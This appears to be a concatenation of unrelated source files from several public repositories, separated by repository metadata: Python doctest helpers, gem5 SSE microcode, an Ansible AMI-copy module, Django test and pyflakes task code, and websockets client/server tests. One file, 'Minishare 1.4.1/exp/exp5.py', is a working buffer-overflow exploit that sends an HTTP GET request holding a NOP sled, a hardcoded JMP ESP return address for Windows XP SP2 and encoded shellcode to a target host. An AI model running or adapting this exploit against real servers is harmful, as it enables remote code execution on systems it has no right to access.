if package and not module_relative:
raise ValueError("Package may only be specified for module-"
"relative paths.")
# Relativize the path.
if module_relative:
package = _normalize_module(package)
path = _module_relative_path(package, path)
# Find the file and read it.
name = os.path.basename(path)
doc = open(path).read()
# Convert it to a test, and wrap it in a DocFileCase.
test = parser.get_doctest(doc, globs, name, path, 0)
return DocFileCase(test, **options)
def DocFileSuite(*paths, **kw):
"""A unittest suite for one or more doctest files.
The path to each doctest file is given as a string; the
interpretation of that string depends on the keyword argument
"module_relative".
A number of options may be provided as keyword arguments:
module_relative
If "module_relative" is True, then the given file paths are
interpreted as os-independent module-relative paths. By
default, these paths are relative to the calling module's
directory; but if the "package" argument is specified, then
they are relative to that package. To ensure os-independence,
"filename" should use "/" characters to separate path
segments, and may not be an absolute path (i.e., it may not
begin with "/").
If "module_relative" is False, then the given file paths are
interpreted as os-specific paths. These paths may be absolute
or relative (to the current working directory).
package
A Python package or the name of a Python package whose directory
should be used as the base directory for module relative paths.
If "package" is not specified, then the calling module's
directory is used as the base directory for module relative
filenames. It is an error to specify "package" if
"module_relative" is False.
setUp
A set-up function. This is called before running the
tests in each file. The setUp function will be passed a DocTest
object. The setUp function can access the test globals as the
globs attribute of the test passed.
tearDown
A tear-down function. This is called after running the
tests in each file. The tearDown function will be passed a DocTest
object. The tearDown function can access the test globals as the
globs attribute of the test passed.
globs
A dictionary containing initial global variables for the tests.
optionflags
A set of doctest option flags expressed as an integer.
parser
A DocTestParser (or subclass) that should be used to extract
tests from the files.
"""
suite = unittest.TestSuite()
# We do this here so that _normalize_module is called at the right
# level. If it were called in DocFileTest, then this function
# would be the caller and we might guess the package incorrectly.
if kw.get('module_relative', True):
kw['package'] = _normalize_module(kw.get('package'))
for path in paths:
suite.addTest(DocFileTest(path, **kw))
return suite
######################################################################
## 9. Debugging Support
######################################################################
def script_from_examples(s):
output = []
for piece in DocTestParser().parse(s):
if isinstance(piece, Example):
# Add the example's source code (strip trailing NL)
output.append(piece.source[:-1])
# Add the expected output:
want = piece.want
if want:
output.append('# Expected:')
output += ['## '+l for l in want.split('\n')[:-1]]
else:
# Add non-example text.
output += [_comment_line(l)
for l in piece.split('\n')[:-1]]
# Trim junk on both ends.
while output and output[-1] == '#':
output.pop()
while output and output[0] == '#':
output.pop(0)
# Combine the output, and return it.
# Add a courtesy newline to prevent exec from choking (see bug #1172785)
return '\n'.join(output) + '\n'
def testsource(module, name):
"""Extract the test sources from a doctest docstring as a script.
Provide the module (or dotted name of the module) containing the
test to be debugged and the name (within the module) of the object
with the doc string with tests to be debugged.
"""
module = _normalize_module(module)
tests = DocTestFinder().find(module)
test = [t for t in tests if t.name == name]
if not test:
raise ValueError(name, "not found in tests")
test = test[0]
testsrc = script_from_examples(test.docstring)
return testsrc
def debug_src(src, pm=False, globs=None):
"""Debug a single doctest docstring, in argument `src`'"""
testsrc = script_from_examples(src)
debug_script(testsrc, pm, globs)
def debug_script(src, pm=False, globs=None):
"Debug a test script. `src` is the script, as a string."
import pdb
# Note that tempfile.NameTemporaryFile() cannot be used. As the
# docs say, a file so created cannot be opened by name a second time
# on modern Windows boxes, and execfile() needs to open it.
srcfilename = tempfile.mktemp(".py", "doctestdebug")
f = open(srcfilename, 'w')
f.write(src)
f.close()
try:
if globs:
globs = globs.copy()
else:
globs = {}
if pm:
try:
exec(compile(open(srcfilename).read(), srcfilename, 'exec'), globs, globs)
except:
print(sys.exc_info()[1])
pdb.post_mortem(sys.exc_info()[2])
else:
# Note that %r is vital here. '%s' instead can, e.g., cause
# backslashes to get treated as metacharacters on Windows.
pdb.run("execfile(%r)" % srcfilename, globs, globs)
finally:
os.remove(srcfilename)
def debug(module, name, pm=False):
"""Debug a single doctest docstring.
Provide the module (or dotted name of the module) containing the
test to be debugged and the name (within the module) of the object
with the docstring with tests to be debugged.
"""
module = _normalize_module(module)
testsrc = testsource(module, name)
debug_script(testsrc, pm, module.__dict__)
__test__ = {}
|
apache-2.0
|
zhaishaomin/LDS-prefetcher-research
|
gem5_src/arch/x86/isa/insts/simd128/integer/data_reordering/extract_and_insert.py
|
91
|
2838
|
# Copyright (c) 2007 The Hewlett-Packard Development Company
# All rights reserved.
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Gabe Black
microcode = '''
def macroop PEXTRW_R_XMM_I {
mov2int reg, xmmlm, "IMMEDIATE & mask(3)", size=2, ext=1
mov2int reg, xmmhm, "IMMEDIATE & mask(3)", size=2, ext=1
};
def macroop PINSRW_XMM_R_I {
mov2fp xmml, regm, "IMMEDIATE & mask(3)", size=2, ext=1
mov2fp xmmh, regm, "IMMEDIATE & mask(3)", size=2, ext=1
};
def macroop PINSRW_XMM_M_I {
ld t1, seg, sib, disp, dataSize=2
mov2fp xmml, t1, "IMMEDIATE & mask(3)", size=2, ext=1
mov2fp xmmh, t1, "IMMEDIATE & mask(3)", size=2, ext=1
};
def macroop PINSRW_XMM_P_I {
rdip t7
ld t1, seg, riprel, disp, dataSize=2
mov2fp xmml, t1, "IMMEDIATE & mask(3)", size=2, ext=1
mov2fp xmmh, t1, "IMMEDIATE & mask(3)", size=2, ext=1
};
'''
|
apache-2.0
|
GheRivero/ansible
|
lib/ansible/modules/cloud/amazon/ec2_ami_copy.py
|
12
|
7355
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: ec2_ami_copy
short_description: copies AMI between AWS regions, return new image id
description:
- Copies AMI from a source region to a destination region. B(Since version 2.3 this module depends on boto3.)
version_added: "2.0"
options:
source_region:
description:
- The source region the AMI should be copied from.
required: true
source_image_id:
description:
- The ID of the AMI in source region that should be copied.
required: true
name:
description:
- The name of the new AMI to copy. (As of 2.3 the default is 'default', in prior versions it was 'null'.)
default: "default"
description:
description:
- An optional human-readable string describing the contents and purpose of the new AMI.
encrypted:
description:
- Whether or not the destination snapshots of the copied AMI should be encrypted.
version_added: "2.2"
kms_key_id:
description:
- KMS key id used to encrypt image. If not specified, uses default EBS Customer Master Key (CMK) for your account.
version_added: "2.2"
wait:
description:
- Wait for the copied AMI to be in state 'available' before returning.
type: bool
default: 'no'
wait_timeout:
description:
- How long before wait gives up, in seconds. Prior to 2.3 the default was 1200.
- From 2.3-2.5 this option was deprecated in favor of boto3 waiter defaults.
This was reenabled in 2.6 to allow timeouts greater than 10 minutes.
default: 600
tags:
description:
- A hash/dictionary of tags to add to the new copied AMI; '{"key":"value"}' and '{"key":"value","key":"value"}'
tag_equality:
description:
- Whether to use tags if the source AMI already exists in the target region. If this is set, and all tags match
in an existing AMI, the AMI will not be copied again.
default: false
version_added: 2.6
author: "Amir Moulavi <amir.moulavi@gmail.com>, Tim C <defunct@defunct.io>"
extends_documentation_fragment:
- aws
- ec2
requirements:
- boto3
'''
EXAMPLES = '''
# Basic AMI Copy
- ec2_ami_copy:
source_region: us-east-1
region: eu-west-1
source_image_id: ami-xxxxxxx
# AMI copy wait until available
- ec2_ami_copy:
source_region: us-east-1
region: eu-west-1
source_image_id: ami-xxxxxxx
wait: yes
wait_timeout: 1200 # Default timeout is 600
register: image_id
# Named AMI copy
- ec2_ami_copy:
source_region: us-east-1
region: eu-west-1
source_image_id: ami-xxxxxxx
name: My-Awesome-AMI
description: latest patch
# Tagged AMI copy (will not copy the same AMI twice)
- ec2_ami_copy:
source_region: us-east-1
region: eu-west-1
source_image_id: ami-xxxxxxx
tags:
Name: My-Super-AMI
Patch: 1.2.3
tag_equality: yes
# Encrypted AMI copy
- ec2_ami_copy:
source_region: us-east-1
region: eu-west-1
source_image_id: ami-xxxxxxx
encrypted: yes
# Encrypted AMI copy with specified key
- ec2_ami_copy:
source_region: us-east-1
region: eu-west-1
source_image_id: ami-xxxxxxx
encrypted: yes
kms_key_id: arn:aws:kms:us-east-1:XXXXXXXXXXXX:key/746de6ea-50a4-4bcb-8fbc-e3b29f2d367b
'''
RETURN = '''
image_id:
description: AMI ID of the copied AMI
returned: always
type: string
sample: ami-e689729e
'''
from ansible.module_utils.aws.core import AnsibleAWSModule
from ansible.module_utils.ec2 import ec2_argument_spec
from ansible.module_utils.ec2 import camel_dict_to_snake_dict, ansible_dict_to_boto3_tag_list
try:
from botocore.exceptions import ClientError, NoCredentialsError, WaiterError, BotoCoreError
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
def copy_image(module, ec2):
"""
Copies an AMI
module : AnsibleModule object
ec2: ec2 connection object
"""
image = None
changed = False
tags = module.params.get('tags')
params = {'SourceRegion': module.params.get('source_region'),
'SourceImageId': module.params.get('source_image_id'),
'Name': module.params.get('name'),
'Description': module.params.get('description'),
'Encrypted': module.params.get('encrypted'),
}
if module.params.get('kms_key_id'):
params['KmsKeyId'] = module.params.get('kms_key_id')
try:
if module.params.get('tag_equality'):
filters = [{'Name': 'tag:%s' % k, 'Values': [v]} for (k, v) in module.params.get('tags').items()]
filters.append(dict(Name='state', Values=['available', 'pending']))
images = ec2.describe_images(Filters=filters)
if len(images['Images']) > 0:
image = images['Images'][0]
if not image:
image = ec2.copy_image(**params)
image_id = image['ImageId']
if tags:
ec2.create_tags(Resources=[image_id],
Tags=ansible_dict_to_boto3_tag_list(tags))
changed = True
if module.params.get('wait'):
delay = 15
max_attempts = module.params.get('wait_timeout') // delay
ec2.get_waiter('image_available').wait(
ImageIds=[image_id],
WaiterConfig={'Delay': delay, 'MaxAttempts': max_attempts}
)
module.exit_json(changed=changed, **camel_dict_to_snake_dict(image))
except WaiterError as e:
module.fail_json_aws(e, msg='An error occurred waiting for the image to become available')
except (ClientError, BotoCoreError) as e:
module.fail_json_aws(e, msg="Could not copy AMI")
except Exception as e:
module.fail_json(msg='Unhandled exception. (%s)' % str(e))
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(dict(
source_region=dict(required=True),
source_image_id=dict(required=True),
name=dict(default='default'),
description=dict(default=''),
encrypted=dict(type='bool', default=False, required=False),
kms_key_id=dict(type='str', required=False),
wait=dict(type='bool', default=False),
wait_timeout=dict(type='int', default=600),
tags=dict(type='dict')),
tag_equality=dict(type='bool', default=False))
module = AnsibleAWSModule(argument_spec=argument_spec)
# TODO: Check botocore version
ec2 = module.client('ec2')
copy_image(module, ec2)
if __name__ == '__main__':
main()
|
gpl-3.0
|
onedal88/Exploits-1
|
Minishare 1.4.1 /exp/exp5.py
|
3
|
1396
|
#exp5
#!/usr/bin/python
import socket
target_address="127.0.0.1"
target_port=80
buffer = "GET "
buffer+= "\x90" * 1787
buffer+= "\x65\x82\xA5\x7C" # EIP Overwrite. Shell32.dll, XP SP2, JMP ESP, 7CA58265.
buffer+= "\x90" * 16
buffer+= ("\xdb\xca\xd9\x74\x24\xf4\x58\xbb\x17\xb3\xcd\x3f\x2b\xc9\xb1"
"\x33\x31\x58\x17\x83\xe8\xfc\x03\x4f\xa0\x2f\xca\x93\x2e\x26"
"\x35\x6b\xaf\x59\xbf\x8e\x9e\x4b\xdb\xdb\xb3\x5b\xaf\x89\x3f"
"\x17\xfd\x39\xcb\x55\x2a\x4e\x7c\xd3\x0c\x61\x7d\xd5\x90\x2d"
"\xbd\x77\x6d\x2f\x92\x57\x4c\xe0\xe7\x96\x89\x1c\x07\xca\x42"
"\x6b\xba\xfb\xe7\x29\x07\xfd\x27\x26\x37\x85\x42\xf8\xcc\x3f"
"\x4c\x28\x7c\x4b\x06\xd0\xf6\x13\xb7\xe1\xdb\x47\x8b\xa8\x50"
"\xb3\x7f\x2b\xb1\x8d\x80\x1a\xfd\x42\xbf\x93\xf0\x9b\x87\x13"
"\xeb\xe9\xf3\x60\x96\xe9\xc7\x1b\x4c\x7f\xda\xbb\x07\x27\x3e"
"\x3a\xcb\xbe\xb5\x30\xa0\xb5\x92\x54\x37\x19\xa9\x60\xbc\x9c"
"\x7e\xe1\x86\xba\x5a\xaa\x5d\xa2\xfb\x16\x33\xdb\x1c\xfe\xec"
"\x79\x56\xec\xf9\xf8\x35\x7a\xff\x89\x43\xc3\xff\x91\x4b\x63"
"\x68\xa3\xc0\xec\xef\x3c\x03\x49\x1f\x77\x0e\xfb\x88\xde\xda"
"\xbe\xd4\xe0\x30\xfc\xe0\x62\xb1\x7c\x17\x7a\xb0\x79\x53\x3c"
"\x28\xf3\xcc\xa9\x4e\xa0\xed\xfb\x2c\x27\x7e\x67\x9d\xc2\x06"
"\x02\xe1")
buffer+= " HTTP/1.1\r\n\r\n"
sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=sock.connect((target_address,target_port))
sock.send(buffer)
sock.close()
|
gpl-3.0
|
LighthouseHPC/lighthouse
|
src/Dlighthouse/registration/tests/__init__.py
|
59
|
1347
|
from django.test import TestCase
import registration
from registration.tests.backends import *
from registration.tests.forms import *
from registration.tests.models import *
from registration.tests.views import *
class RegistrationVersionInfoTests(TestCase):
"""
Test django-registration's internal version-reporting
infrastructure.
"""
def setUp(self):
self.version = registration.VERSION
def tearDown(self):
registration.VERSION = self.version
def test_get_version(self):
"""
Test the version-info reporting.
"""
versions = [
{'version': (1, 0, 0, 'alpha', 0),
'expected': "1.0 pre-alpha"},
{'version': (1, 0, 1, 'alpha', 1),
'expected': "1.0.1 alpha 1"},
{'version': (1, 1, 0, 'beta', 2),
'expected': "1.1 beta 2"},
{'version': (1, 2, 1, 'rc', 3),
'expected': "1.2.1 rc 3"},
{'version': (1, 3, 0, 'final', 0),
'expected': "1.3"},
{'version': (1, 4, 1, 'beta', 0),
'expected': "1.4.1 beta"},
]
for version_dict in versions:
registration.VERSION = version_dict['version']
self.assertEqual(registration.get_version(), version_dict['expected'])
|
mit
|
MiltosD/CEFELRC
|
lib/python2.7/site-packages/django_jenkins/tasks/run_pyflakes.py
|
3
|
1798
|
# -*- coding: utf-8 -*-
import os
import re
import sys
from pyflakes.scripts import pyflakes
from cStringIO import StringIO
from django_jenkins.functions import relpath
from django_jenkins.tasks import BaseTask, get_apps_locations
class Task(BaseTask):
def __init__(self, test_labels, options):
super(Task, self).__init__(test_labels, options)
self.test_all = options['test_all']
if options.get('pyflakes_file_output', True):
output_dir = options['output_dir']
if not os.path.exists(output_dir):
os.makedirs(output_dir)
self.output = open(os.path.join(output_dir, 'pyflakes.report'), 'w')
else:
self.output = sys.stdout
def teardown_test_environment(self, **kwargs):
locations = get_apps_locations(self.test_labels, self.test_all)
# run pyflakes tool with captured output
old_stdout, pyflakes_output = sys.stdout, StringIO()
sys.stdout = pyflakes_output
try:
for location in locations:
if os.path.isdir(location):
for dirpath, dirnames, filenames in os.walk(relpath(location)):
for filename in filenames:
if filename.endswith('.py'):
pyflakes.checkPath(os.path.join(dirpath, filename))
else:
pyflakes.checkPath(relpath(location))
finally:
sys.stdout = old_stdout
# save report
pyflakes_output.reset()
while True:
line = pyflakes_output.readline()
if not line:
break
message = re.sub(r': ', r': [E] PYFLAKES:', line)
self.output.write(message)
self.output.close()
|
bsd-3-clause
|
Dino0631/RedRain-Bot
|
cogs/lib/websockets/test_client_server.py
|
8
|
17883
|
import asyncio
import logging
import os
import ssl
import unittest
import unittest.mock
from .client import *
from .exceptions import ConnectionClosed, InvalidHandshake
from .http import USER_AGENT, read_response
from .server import *
# Avoid displaying stack traces at the ERROR logging level.
logging.basicConfig(level=logging.CRITICAL)
testcert = os.path.join(os.path.dirname(__file__), 'testcert.pem')
@asyncio.coroutine
def handler(ws, path):
if path == '/attributes':
yield from ws.send(repr((ws.host, ws.port, ws.secure)))
elif path == '/headers':
yield from ws.send(str(ws.request_headers))
yield from ws.send(str(ws.response_headers))
elif path == '/raw_headers':
yield from ws.send(repr(ws.raw_request_headers))
yield from ws.send(repr(ws.raw_response_headers))
elif path == '/subprotocol':
yield from ws.send(repr(ws.subprotocol))
else:
yield from ws.send((yield from ws.recv()))
class ClientServerTests(unittest.TestCase):
secure = False
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
def tearDown(self):
self.loop.close()
def run_loop_once(self):
# Process callbacks scheduled with call_soon by appending a callback
# to stop the event loop then running it until it hits that callback.
self.loop.call_soon(self.loop.stop)
self.loop.run_forever()
def start_server(self, **kwds):
server = serve(handler, 'localhost', 8642, **kwds)
self.server = self.loop.run_until_complete(server)
def start_client(self, path='', **kwds):
client = connect('ws://localhost:8642/' + path, **kwds)
self.client = self.loop.run_until_complete(client)
def stop_client(self):
try:
self.loop.run_until_complete(
asyncio.wait_for(self.client.worker_task, timeout=1))
except asyncio.TimeoutError: # pragma: no cover
self.fail("Client failed to stop")
def stop_server(self):
self.server.close()
try:
self.loop.run_until_complete(
asyncio.wait_for(self.server.wait_closed(), timeout=1))
except asyncio.TimeoutError: # pragma: no cover
self.fail("Server failed to stop")
def test_basic(self):
self.start_server()
self.start_client()
self.loop.run_until_complete(self.client.send("Hello!"))
reply = self.loop.run_until_complete(self.client.recv())
self.assertEqual(reply, "Hello!")
self.stop_client()
self.stop_server()
def test_server_close_while_client_connected(self):
self.start_server()
self.start_client()
self.stop_server()
def test_explicit_event_loop(self):
self.start_server(loop=self.loop)
self.start_client(loop=self.loop)
self.loop.run_until_complete(self.client.send("Hello!"))
reply = self.loop.run_until_complete(self.client.recv())
self.assertEqual(reply, "Hello!")
self.stop_client()
self.stop_server()
def test_protocol_attributes(self):
self.start_server()
self.start_client('attributes')
expected_attrs = ('localhost', 8642, self.secure)
client_attrs = (self.client.host, self.client.port, self.client.secure)
self.assertEqual(client_attrs, expected_attrs)
server_attrs = self.loop.run_until_complete(self.client.recv())
self.assertEqual(server_attrs, repr(expected_attrs))
self.stop_client()
self.stop_server()
def test_protocol_headers(self):
self.start_server()
self.start_client('headers')
client_req = self.client.request_headers
client_resp = self.client.response_headers
self.assertEqual(client_req['User-Agent'], USER_AGENT)
self.assertEqual(client_resp['Server'], USER_AGENT)
server_req = self.loop.run_until_complete(self.client.recv())
server_resp = self.loop.run_until_complete(self.client.recv())
self.assertEqual(server_req, str(client_req))
self.assertEqual(server_resp, str(client_resp))
self.stop_client()
self.stop_server()
def test_protocol_raw_headers(self):
self.start_server()
self.start_client('raw_headers')
client_req = self.client.raw_request_headers
client_resp = self.client.raw_response_headers
self.assertEqual(dict(client_req)['User-Agent'], USER_AGENT)
self.assertEqual(dict(client_resp)['Server'], USER_AGENT)
server_req = self.loop.run_until_complete(self.client.recv())
server_resp = self.loop.run_until_complete(self.client.recv())
self.assertEqual(server_req, repr(client_req))
self.assertEqual(server_resp, repr(client_resp))
self.stop_client()
self.stop_server()
def test_protocol_custom_request_headers_dict(self):
self.start_server()
self.start_client('raw_headers', extra_headers={'X-Spam': 'Eggs'})
req_headers = self.loop.run_until_complete(self.client.recv())
self.loop.run_until_complete(self.client.recv())
self.assertIn("('X-Spam', 'Eggs')", req_headers)
self.stop_client()
self.stop_server()
def test_protocol_custom_request_headers_list(self):
self.start_server()
self.start_client('raw_headers', extra_headers=[('X-Spam', 'Eggs')])
req_headers = self.loop.run_until_complete(self.client.recv())
self.loop.run_until_complete(self.client.recv())
self.assertIn("('X-Spam', 'Eggs')", req_headers)
self.stop_client()
self.stop_server()
def test_protocol_custom_response_headers_callable_dict(self):
self.start_server(extra_headers=lambda p, r: {'X-Spam': 'Eggs'})
self.start_client('raw_headers')
self.loop.run_until_complete(self.client.recv())
resp_headers = self.loop.run_until_complete(self.client.recv())
self.assertIn("('X-Spam', 'Eggs')", resp_headers)
self.stop_client()
self.stop_server()
def test_protocol_custom_response_headers_callable_list(self):
self.start_server(extra_headers=lambda p, r: [('X-Spam', 'Eggs')])
self.start_client('raw_headers')
self.loop.run_until_complete(self.client.recv())
resp_headers = self.loop.run_until_complete(self.client.recv())
self.assertIn("('X-Spam', 'Eggs')", resp_headers)
self.stop_client()
self.stop_server()
def test_protocol_custom_response_headers_dict(self):
self.start_server(extra_headers={'X-Spam': 'Eggs'})
self.start_client('raw_headers')
self.loop.run_until_complete(self.client.recv())
resp_headers = self.loop.run_until_complete(self.client.recv())
self.assertIn("('X-Spam', 'Eggs')", resp_headers)
self.stop_client()
self.stop_server()
def test_protocol_custom_response_headers_list(self):
self.start_server(extra_headers=[('X-Spam', 'Eggs')])
self.start_client('raw_headers')
self.loop.run_until_complete(self.client.recv())
resp_headers = self.loop.run_until_complete(self.client.recv())
self.assertIn("('X-Spam', 'Eggs')", resp_headers)
self.stop_client()
self.stop_server()
def test_no_subprotocol(self):
self.start_server()
self.start_client('subprotocol')
server_subprotocol = self.loop.run_until_complete(self.client.recv())
self.assertEqual(server_subprotocol, repr(None))
self.assertEqual(self.client.subprotocol, None)
self.stop_client()
self.stop_server()
def test_subprotocol_found(self):
self.start_server(subprotocols=['superchat', 'chat'])
self.start_client('subprotocol', subprotocols=['otherchat', 'chat'])
server_subprotocol = self.loop.run_until_complete(self.client.recv())
self.assertEqual(server_subprotocol, repr('chat'))
self.assertEqual(self.client.subprotocol, 'chat')
self.stop_client()
self.stop_server()
def test_subprotocol_not_found(self):
self.start_server(subprotocols=['superchat'])
self.start_client('subprotocol', subprotocols=['otherchat'])
server_subprotocol = self.loop.run_until_complete(self.client.recv())
self.assertEqual(server_subprotocol, repr(None))
self.assertEqual(self.client.subprotocol, None)
self.stop_client()
self.stop_server()
def test_subprotocol_not_offered(self):
self.start_server()
self.start_client('subprotocol', subprotocols=['otherchat', 'chat'])
server_subprotocol = self.loop.run_until_complete(self.client.recv())
self.assertEqual(server_subprotocol, repr(None))
self.assertEqual(self.client.subprotocol, None)
self.stop_client()
self.stop_server()
def test_subprotocol_not_requested(self):
self.start_server(subprotocols=['superchat', 'chat'])
self.start_client('subprotocol')
server_subprotocol = self.loop.run_until_complete(self.client.recv())
self.assertEqual(server_subprotocol, repr(None))
self.assertEqual(self.client.subprotocol, None)
self.stop_client()
self.stop_server()
@unittest.mock.patch.object(WebSocketServerProtocol, 'select_subprotocol')
def test_subprotocol_error(self, _select_subprotocol):
_select_subprotocol.return_value = 'superchat'
self.start_server(subprotocols=['superchat'])
with self.assertRaises(InvalidHandshake):
self.start_client('subprotocol', subprotocols=['otherchat'])
self.run_loop_once()
self.stop_server()
@unittest.mock.patch('websockets.server.read_request')
def test_server_receives_malformed_request(self, _read_request):
_read_request.side_effect = ValueError("read_request failed")
self.start_server()
with self.assertRaises(InvalidHandshake):
self.start_client()
self.stop_server()
@unittest.mock.patch('websockets.client.read_response')
def test_client_receives_malformed_response(self, _read_response):
_read_response.side_effect = ValueError("read_response failed")
self.start_server()
with self.assertRaises(InvalidHandshake):
self.start_client()
self.run_loop_once()
self.stop_server()
@unittest.mock.patch('websockets.client.build_request')
def test_client_sends_invalid_handshake_request(self, _build_request):
def wrong_build_request(set_header):
return '42'
_build_request.side_effect = wrong_build_request
self.start_server()
with self.assertRaises(InvalidHandshake):
self.start_client()
self.stop_server()
@unittest.mock.patch('websockets.server.build_response')
def test_server_sends_invalid_handshake_response(self, _build_response):
def wrong_build_response(set_header, key):
return build_response(set_header, '42')
_build_response.side_effect = wrong_build_response
self.start_server()
with self.assertRaises(InvalidHandshake):
self.start_client()
self.stop_server()
@unittest.mock.patch('websockets.client.read_response')
def test_server_does_not_switch_protocols(self, _read_response):
@asyncio.coroutine
def wrong_read_response(stream):
code, headers = yield from read_response(stream)
return 400, headers
_read_response.side_effect = wrong_read_response
self.start_server()
with self.assertRaises(InvalidHandshake):
self.start_client()
self.run_loop_once()
self.stop_server()
@unittest.mock.patch('websockets.server.WebSocketServerProtocol.send')
def test_server_handler_crashes(self, send):
send.side_effect = ValueError("send failed")
self.start_server()
self.start_client()
self.loop.run_until_complete(self.client.send("Hello!"))
with self.assertRaises(ConnectionClosed):
self.loop.run_until_complete(self.client.recv())
self.stop_client()
self.stop_server()
# Connection ends with an unexpected error.
self.assertEqual(self.client.close_code, 1011)
@unittest.mock.patch('websockets.server.WebSocketServerProtocol.close')
def test_server_close_crashes(self, close):
close.side_effect = ValueError("close failed")
self.start_server()
self.start_client()
self.loop.run_until_complete(self.client.send("Hello!"))
reply = self.loop.run_until_complete(self.client.recv())
self.assertEqual(reply, "Hello!")
self.stop_client()
self.stop_server()
# Connection ends with an abnormal closure.
self.assertEqual(self.client.close_code, 1006)
@unittest.mock.patch.object(WebSocketClientProtocol, 'handshake')
def test_client_closes_connection_before_handshake(self, handshake):
self.start_server()
self.start_client()
# We have mocked the handshake() method to prevent the client from
# performing the opening handshake. Force it to close the connection.
self.loop.run_until_complete(self.client.close_connection(force=True))
self.stop_client()
# The server should stop properly anyway. It used to hang because the
# worker handling the connection was waiting for the opening handshake.
self.stop_server()
@unittest.mock.patch('websockets.server.read_request')
def test_server_shuts_down_during_opening_handshake(self, _read_request):
_read_request.side_effect = asyncio.CancelledError
self.start_server()
self.server.closing = True
with self.assertRaises(InvalidHandshake) as raised:
self.start_client()
self.stop_server()
# Opening handshake fails with 503 Service Unavailable
self.assertEqual(str(raised.exception), "Bad status code: 503")
def test_server_shuts_down_during_connection_handling(self):
self.start_server()
self.start_client()
self.server.close()
with self.assertRaises(ConnectionClosed):
self.loop.run_until_complete(self.client.recv())
self.stop_client()
self.stop_server()
# Websocket connection terminates with 1001 Going Away.
self.assertEqual(self.client.close_code, 1001)
@unittest.skipUnless(os.path.exists(testcert), "test certificate is missing")
class SSLClientServerTests(ClientServerTests):
secure = True
@property
def server_context(self):
ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ssl_context.load_cert_chain(testcert)
return ssl_context
@property
def client_context(self):
ssl_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
ssl_context.load_verify_locations(testcert)
ssl_context.verify_mode = ssl.CERT_REQUIRED
return ssl_context
def start_server(self, *args, **kwds):
kwds['ssl'] = self.server_context
server = serve(handler, 'localhost', 8642, **kwds)
self.server = self.loop.run_until_complete(server)
def start_client(self, path='', **kwds):
kwds['ssl'] = self.client_context
client = connect('wss://localhost:8642/' + path, **kwds)
self.client = self.loop.run_until_complete(client)
def test_ws_uri_is_rejected(self):
self.start_server()
client = connect('ws://localhost:8642/', ssl=self.client_context)
with self.assertRaises(ValueError):
self.loop.run_until_complete(client)
self.stop_server()
class ClientServerOriginTests(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
def tearDown(self):
self.loop.close()
def test_checking_origin_succeeds(self):
server = self.loop.run_until_complete(
serve(handler, 'localhost', 8642, origins=['http://localhost']))
client = self.loop.run_until_complete(
connect('ws://localhost:8642/', origin='http://localhost'))
self.loop.run_until_complete(client.send("Hello!"))
self.assertEqual(self.loop.run_until_complete(client.recv()), "Hello!")
self.loop.run_until_complete(client.close())
server.close()
self.loop.run_until_complete(server.wait_closed())
def test_checking_origin_fails(self):
server = self.loop.run_until_complete(
serve(handler, 'localhost', 8642, origins=['http://localhost']))
with self.assertRaisesRegex(InvalidHandshake, "Bad status code: 403"):
self.loop.run_until_complete(
connect('ws://localhost:8642/', origin='http://otherhost'))
server.close()
self.loop.run_until_complete(server.wait_closed())
def test_checking_lack_of_origin_succeeds(self):
server = self.loop.run_until_complete(
serve(handler, 'localhost', 8642, origins=['']))
client = self.loop.run_until_complete(connect('ws://localhost:8642/'))
self.loop.run_until_complete(client.send("Hello!"))
self.assertEqual(self.loop.run_until_complete(client.recv()), "Hello!")
self.loop.run_until_complete(client.close())
server.close()
self.loop.run_until_complete(server.wait_closed())
try:
from .py35.client_server import ClientServerContextManager
except (SyntaxError, ImportError): # pragma: no cover
pass
else:
class ClientServerContextManagerTests(ClientServerContextManager,
unittest.TestCase):
pass
|
gpl-3.0
|
douglas-reid/mixer
|
